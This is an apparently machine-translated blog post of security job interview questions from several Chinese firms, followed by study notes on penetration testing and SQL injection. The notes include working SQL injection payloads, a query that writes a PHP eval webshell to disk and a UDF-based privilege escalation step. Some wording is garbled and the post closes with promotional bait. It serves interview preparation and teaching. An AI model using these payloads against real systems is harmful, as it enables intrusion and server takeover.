Network security job interview questions and interview experience sharing! It took three days and three nights to sort out the liver, which is absolutely the most complete!

1. ByteDance - Penetration Testing Intern

Self introduction
penetration process
How to deal with the pan-analysis problem of subdomain name blasting in information collection
How to bypass CDN to find real ip
What information will you pay attention to in phpinfo
Have you ever heard about permission maintenance?
Tell me about a vulnerability that you feel good about, and talk about it
How to defend against XSS output to href
The principle of samesite defense against CSRF
CSRF defense
How to defend against CSRF in json format
Browser parsing order and decoding order
How to bypass the SQL injection of filtering commas
How to bypass the comma after filtering limit
fastjson-related vulnerabilities
Talk about a python-related vulnerability you know (SSTI principle, exploit process, payload-related things) open question and answer

2. Sangfor - Vulnerability Researcher Internship

Self introduction
What did you do during your internship in xx
Briefly explain the idea of penetration testing
What role does the protective net play in it?
Some thoughts on the red team
Did you do horizontal orientation after taking down the system?
Is there any research on log4j some time ago? Can you briefly talk about it?
(following the previous question) What are the ways to bypass obfuscation
Have you ever understood the memory horse?
Have you ever heard of tools like Ice Scorpion and Godzilla?
Did you study any attacks when you were in the attack team, such as researching some tools or magic modification?
With so many vulnerabilities and attacks, which one is better at?
Let me talk about the reasons for the formation of shiro deserialization and the utilization chain
Have you ever learned about some bypass methods? Can you briefly introduce the posture?
Questions

3. Bytedance-Security Research Intern

The position you applied for is a security research intern. Do you know what we mainly do here?
Self introduction
Is there any direction that you want to do now? For example, the code audit you wrote, offensive and defensive drills, and your research direction in school (cryptography) are actually three major directions. Is there anything you want to do now?
Have you reviewed open source frameworks, cms, middleware, etc.
The interviewer introduced the job content
I see that there are several internship experiences and project experiences on your resume. Let’s talk about the internship experience first. What do you mainly do in A?
Talk in detail about what intrusion detection is mainly doing and the problems encountered
Have you analyzed the reasons for the large number of false positives generated by intrusion detection, and is there a better solution?
Compared with A, B should be more aggressive, right? There are wars (fog, the interviewer seems to have said so) and code audits. Let’s talk about what you mainly do in B.
The steps and ideas of reviewing the expression engine
The audit you mentioned just now sounds similar to the audit of ordinary development. It is done through program flow and documents. Have you audited some projects from the perspective of security?
How xxe is caused, from the code level
I see that your resume has a lot of offensive and defensive drill experience, right? Is there any one of these offensive and defensive drill experiences that is more impressive? Pick one and talk about it
It seems that your attack is more about using weak passwords. Do you have some more skillful methods?
How is the webshell uploaded by this avatar uploaded?
What other ways of testing are there? How to bypass it?
The log4j vulnerability is very popular these two days, have you checked it out?
The interviewer finally introduces the business
Questions

4. Chaitin Technology-Security Service Engineer

Self introduction
Has web penetration testing ever been practiced?
Talk about the principle of sql injection
Have you ever understood the cause of sql injection from the code level (if the code level refers to the sql statement, the answer is yes)
If you don’t understand xss, do you understand the principle of xss from the code level
Which one is more familiar with owasp top10 vulnerabilities
Talk about how to defend against sql injection
How does sql injection bypass filtering
I asked if xx was a target when defending the net, and whether he has made any research and judgment on the behavior of the attacking team
The content of the work when protecting the network in xx, have you ever done research and judgment on traffic packets and data packets?
The role played during the school’s offensive and defensive drills, the main work content, the ideas of the penetration test, and the results (this question is quite detailed, specific to the assigned tasks, whether the host computer or domain controller has been taken down, the form and duration of the offensive and defensive drills) time to talk)
I usually play a lot of ctf, what are the results?
Will you usually pay attention to some novel vulnerabilities, will you do code audits, such as Shiro vulnerabilities, etc. Have you ever reproduced vulnerabilities?
Do you know anything about phishing emails?
What is the current direction of study
Finally, introduce the talent demand
Questions

5. Tencent-Security Technology Intern

Self introduction
Do you understand sql injection? Tell me about the principle of secondary injection
How to fix the secondary injection
Do you understand that sql has been injected into waf? If a sql injection filters the information keyword, how to bypass it?
Redis unauthorized access
A complete process of penetration testing
When playing ctf, did you encounter any particularly impressive questions?
Is there a better way to exploit the file download vulnerability?
Use the file download vulnerability to find the file name. Specifically, what file name to look for (which files are generally read when reading a file) (in ctf? in actual combat?)
Command execution vulnerability, what is the better way to deal with http not going online (speak a little more)
Continuing from the previous question, communicate through tunnels, explain in detail what type of tunnels are passed through, and talk about specific operations
Vulnerability warning
Have you ever reproduced a middleware type vulnerability (whether you have reproduced a complete vulnerability)
What are the main responsibilities of the role played in the school's offensive and defensive drills?

6. Xpeng Motors - Safety Engineer

Self introduction
Have you ever dug up the src?
How do you usually learn web penetration? Is there any actual combat? Have you ever successfully found a vulnerability?
What tools have you been exposed to when doing web penetration
What is the xxe vulnerability? What is ssrf?
When playing ctf, what direction are you responsible for?
Why do you want to engage in information security, how much interest do you have in security, whether you will change careers in the future, or plan to continue working in security
How do you usually learn about safety? If you were asked to take a new direction (app safety), how much time would you spend on learning, or do you have a direction you want to do?
Talk about the process of code audit
How do you usually do code auditing?
Have you audited open source frameworks and CMS?
How to judge whether a database is mysql or oracle?
Types of sql injection and how to use it?
Talk about the principle and defense ideas of sql injection
What language did you use for development?
What framework did you use when doing java development? Can you do java security development?
Have you ever done Android development?
Have you ever written a tool in python?
Which vulnerability is used by msf, and has it successfully rebounded?
What did you mainly do when protecting the network, and talk about your understanding of security products
The company now needs someone who can do app security. If you want to do it now, will you learn it, or are you interested, or do you have other things you want to do? If you don’t want to do app security, how much time can you spend learning
Do you understand intranet penetration? Talk about the idea of intranet penetration

7. Summary of high-frequency interview questions in Dachang

This time I spent three months sorting out the interview questions for the network security service positions of major security vendors (including but not limited to: security service engineer, security operation engineer, security operation and maintenance engineer, security attack and defense engineer").

Without further ado, let's learn together

At present, there are still a lot of impreciseness and redundancy, and I implore my friends to correct and modify!

The length of the article is limited and a collection of interview questions needs to be sorted out. Click the chicken below to get the csdn gift package for free. Remember to make a note~

csdn interview spree "summary of interview questions in major factories with answer analysis click to receive"

7.1, SQL injection protection method

Broken authentication and session management
Cross-site scripting attack XSS
direct reference to an unsafe object
security misconfiguration
Sensitive Information Leakage
Lack of function-level access control
Cross Site Request Forgery CSRF
Use of components with known vulnerabilities
Unvalidated Redirects and Forwards

7.2 Common Web Security Vulnerabilities

SQL injection
XSS
File traversal, file upload, file download
vertical override, horizontal override
logic loophole
First of all, for newcomers, most of the students have no actual combat experience. In response to the interviewer's questions, talk about your actual penetration testing, but many people have no way to speak.

7.3. Given a website, how do you perform penetration testing?

subject to written authorization.

1) Information collection

Obtain the whois information of the domain name, obtain the registrant's email address, name and phone number, etc.

Query server side sites and sub-domain sites, because the main site is generally more difficult, so first check if there are any common cms or other loopholes in the side sites.

Check the server operating system version, web middleware, and see if there are known vulnerabilities, such as IIS, APACHE, and NGINX parsing vulnerabilities

Check the IP, scan the IP address port, and detect the vulnerability of the corresponding port, such as rsync, Heartbleed, mysql, ftp, ssh weak password, etc.

Scan the directory structure of the website to see if the directory can be traversed, or sensitive files are leaked, such as php probes

Google hack further detects website information, background, sensitive files

2) Vulnerability scanning

Start to detect vulnerabilities, such as XSS, XSRF, sql injection, code execution, command execution, unauthorized access, directory reading, arbitrary file reading, downloading, file inclusion,

Remote command execution, weak passwords, uploads, editor vulnerabilities, brute force cracking, etc.

3) Exploitation

Use the above methods to get webshell, or other permissions

4) Privilege Escalation

Privilege escalation server, such as udf privilege escalation of mysql under windows, serv-u privilege escalation, vulnerabilities in lower versions of windows, such as iis6, pr, Brazilian barbecue,

Linux hidden cow vulnerability, linux kernel version vulnerability escalation of privilege, mysql system privilege escalation under linux and oracle low privilege escalation

5) Log cleaning

6) Summary report and repair plan

7.4. Penetration testing process

project interview
Information collection: whois, website source IP, side station, C-segment website, server system version, container version, program version, database type, second-level domain name, firewall, maintainer information
Vulnerability scanning: Nessus, AWVS
Digging by hand: logic holes
Validation Vulnerabilities
repair suggestion
(if any) Baseline Check/Retest Vulnerabilities
output report
overview
Test basic information
Test Range
testing time
test task
Testing process
Comprehensive analysis of information security risks
Overall Risk Analysis
Risk Impact Analysis
System Security Analysis
List of Security Vulnerabilities
Solution suggestion
Retest report
SQL interview questions

7.5. Types of SQL Injection

Based on error injection
Boolean-based injection, the injection of judging whether the condition is true or false according to the returned page
Time-based blind injection cannot judge any information based on the content returned by the page. Use conditional statements to check whether the time delay statement is executed (that is, whether the page return time has increased).
wide byte injection
Joint query can be injected in the case of union.
Heap query injection, which can execute the injection of multiple statements at the same time.

7.6, the principle of SQL injection

By inserting SQL commands into Web form submissions or entering query strings for domain names or page requests, the server is finally tricked into executing malicious SQL commands. Often unchecked or insufficiently checked user input data or code writing issues accidentally become code execution.

7.7 How to defend against SQL injection

Close application error message
plus waf
filter the input
Limit input length
Restrict database permissions, and grant permissions carefully such as drop/create/truncate
Precompile the sql statement, and generally use ? as a placeholder in python and Php. This method is to solve the sql injection using placeholder parameters from the perspective of programming framework, and it can only be said to prevent injection to a certain extent. There are also buffer overflows, termination characters, etc.
Encryption and security of database information (leading to cryptography). Do not use md5 because there is a rainbow table, generally add salt after md5 once and then md5
Clear programming specifications, paired/automated code review, and a large number of ready-made solutions (PreparedStatement, ActiveRecord, ambiguous character filtering, and only accessible stored procedures balabala) have made the risk of SQL injection very low.
How to prevent injection in a specific language and what security framework to use

7.8, sqlmap, how to inject an injection point?

If it is a get model, directly, sqlmap -u "such as point URL".
If it is a post type such as a point, you can use sqlmap -u "injection point URL" --data="post parameter"
If it is a cookie, X-Forwarded-For, etc., when it is accessible, use burpsuite to capture the packet, replace the injection with *, put it in the file, and then sqlmap -r "file address"

7.9. What is the difference between mysql website injection above 5.0 and below 5.0?

5.0 was released 10 years ago, and now it’s 5.7, it’s meaningless

Below 5.0, there is no information_schema system table, and it is impossible to list names, etc., and can only violently run table names.

Below 5.0 is multi-user single operation, and above 5.0 is multi-user multi-operation.

7.10. MySQL storage engine?

1. InnoDB: the mainstream storage engine. Support transactions, support row locks, support non-locking reads, support foreign key constraints

Provides MySQL with a transaction-safe (ACID-compliant) storage engine with commit, rollback, and crash recovery capabilities. InnoDB locks at the row level and also provides an Oracle-like non-locking read in the SELECT statement. These features increase multi-user deployment and performance. In SQL queries, you can freely mix InnoDB tables with other MySQL table types, even in the same query

The InnoDB storage engine maintains its own buffer pool for caching data and indexes in main memory. InnoDB organizes its tables and indexes in a logical tablespace, which can contain several files (or raw disk files). This is different from MyISAM tables, for example, where each table is stored in a separate file. InnoDB tables can be of any size, even on operating systems where file sizes are limited to 2GB

InnoDB supports foreign key integrity constraints. When storing data in a table, the storage of each table is stored in the order of the primary key. If the primary key is not specified when the table is defined, InnoDB will generate a 6-byte ROWID for each row, and use this as the primary key

2. MyISAM: fast access speed, does not support transactions, and is gradually eliminated

3. MEMORY: BTREE index or HASH index. Put the data in the table in the memory, and the concurrency performance is poor.

4. MERGE, Archive, etc. are not commonly used

7.11. What is a transaction?

A transaction is a set of atomic SQL statements or an independent unit of work. If the database engine can successfully apply this set of SQL statements to the database, it will be executed. If any statement cannot be executed due to a crash or other reasons, then All statements will not be executed. That is to say, the statements in the transaction either all execute successfully or all fail to execute.

A typical example of a banking application:

Suppose the bank's database has two tables: a check table and a savings table. Now a customer A wants to transfer 2,000 yuan from his checking account to his savings account, then at least three steps are required:

a. Check that the balance of A's checking account is higher than 2,000 yuan;

b. Subtract 2,000 yuan from A's checking account balance;

c. Add $2,000 to A's savings account balance.

These three steps must be packaged in one transaction. If any step fails, all steps must be rolled back. Otherwise, A, as a bank customer, may inexplicably lose 2,000 yuan, and something goes wrong. This is a typical transaction. This transaction is the smallest indivisible unit of work. All operations in the entire transaction are either submitted successfully or rolled back if they fail. It is impossible to execute only part of them. This is also the atomic feature of a transaction.

7.12, read lock and write lock

Read locks are shared, that is, they do not block each other, and multiple clients can read the same resource at the same time without interfering with each other. Write locks are exclusive, that is, a write lock will block other write locks and read locks. Only in this way can it be ensured that only one user can perform writing within a given time, preventing other users from reading the same resource being written. Write locks have higher priority than read locks.

7.13, MySQL index

An index is a data structure that helps MySQL retrieve data efficiently. MYISAM and InnoDB storage engines only support BTree indexes; MEMORY and HEAP storage engines can support HASH and BTREE indexes.

7.14. Application of ORDER BY in injection

The field name, expression and field position can be added after order by, and the field position needs to be an integer.

7.15. What is GPC? How to bypass after GPC?

If magic_quotes_gpc=On, the PHP parser will automatically add the escape character "\" to the data from post, get, and cookie to ensure that these data will not cause the program, especially the database statement because of special characters (considered as PHP characters) ) caused by pollution.

7.16. What is the difference between one @ and two @ in Mysql

@ is a user variable, use SET @var1=1 to assign

@@ is system variables, including global variables show global variables \G; and session variables show session variables \G;

7.17. Injecting/bypassing commonly used functions

1. Blind injection based on Boolean SQL

left(database(),1)>'s'

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

Regexp regular injection select user() regexp '^[az]';

select user() like 'ro%'

2. Error-based SQL blind injection

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2) Round down by floor error reporting
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5）.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6）.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7）.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8）.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9）.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10）.exp()select * from test where id=1 and exp(~(select * from(select user())a));

3. How to judge the delayed injection?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

7.18. What do blind injection and delayed injection have in common?

It is a character-by-character judgment

7.19. How to get the webshell of a website?

Upload, edit templates in the background, sql injection write files, command execution, code execution,

Some cms vulnerabilities have been exposed, such as the dedecms background can directly create script files, wordpress upload plug-in contains script files zip archives, etc.

7.20. What are the functions for sql injection to write files?

select 'sentence' into outfile 'path'

select 'sentence' into dumpfile 'path'

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.21. Various shell writing problems

1. What function is used to write the shell?

select '<?php phpinfo()> into outfile 'D:/shelltest.php'

dumpfile

file_put_contents

2. What should I do if the outfile cannot be used?

select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll'; UDF privilege can be raised

3. What is the difference between dumpfile and outfile? outfile is suitable for importing libraries, and a new line will be written and escaped at the end of the line, so it cannot be written into a binary executable file.

4. Can sleep() write shell?

5. What are the conditions for writing a shell?

User rights

Directory read and write permissions

Prevent command execution: disable_functions, disable disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source, but you can use the dl extension to execute the command or the ImageMagick vulnerability page is not found- waiting alone

open_basedir: Limit user-operable files to a certain directory

7.22. What are the functions for sql injection to write files?

select 'sentence' into outfile 'path'

select 'sentence' into dumpfile 'path'

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.23. SQL secondary injection

When inserting data into the database for the first time, I just used addslashes or escaped the special characters in it with the help of get_magic_quotes_gpc. When writing to the database, the original data was still retained, but the data itself was still dirty data.

After storing the data in the database, the developer considers the data to be credible. When the next query is required, the dirty data is directly taken out from the database without further inspection and processing, which will cause a secondary injection of SQL.

On a dating website, filling in the age is an injection point, and the page will display how many users are of the same age as you. Use and 1=1 to determine the injection point, use order by to detect the number of columns, and union select to detect which column the output point is.

暴库 group_concat(schema_name) from information_schema.schemata

暴表 group_concat(table_name) from information_schema.schemata where table_schema='hhh'

Get data concat(flag) from flag

Fix: Escaping or filtering should also be performed when fetching data from a database or file.

7.24 Difference between SQL and NoSQL

SQL relational database, NoSQL (Not only SQL) non-relational database

1. Advantages of SQL

A relational database refers to data represented by a relational mathematical model, in which the data is described in the form of a two-dimensional table.

The structure is stable, not easy to modify, commonly used for joint table query

High query ability, can operate very complex queries

High consistency, processing data will use lock to ensure that the data is not changed

Tables are logical and easy to understand

2. SQL disadvantages

Not suitable for high concurrent reading and writing

Not suitable for efficient reading and writing of massive data

Many layers, low scalability

Maintaining consistency is expensive

Involves joint table query, complex and slow

3. Advantages of NoSQL

Store data in key-value pairs

Since there is no relationship between data, it is easy to expand and query

The data structure is flexible, each data can have a different structure

Queries are faster due to reduced consistency requirements

4. Compare

The emergence of non-relational databases is due to the fact that with the evolution of the website, the concurrency increases, the scalability is high, and the consistency requirements are reduced. In this way, the most important consistency maintenance of relational databases is a bit redundant and consumes performance. Therefore, with a non-relational database, it can be regarded as a weakened result of a relational database, and it is better at storing and querying massive data.

There is no difference between the two databases, they are just used in different environments. A relational database can be said to be a more rigorous and more reliable database. In an environment that requires high data accuracy, such as a banking system, a database like mysql is naturally suitable. Non-relational databases are superior in the speed of processing big data, but the accuracy of the data is not so high, and it is more suitable for environments with a large amount of operations, such as most of the current web2.0 websites.

Friends who can see here must give a wave of benefits! All the above information interview questions, comment and leave a message, kick me in the background, or click the link in the article to share with everyone for free! I hope to be helpful! Thank you all for reading and watching!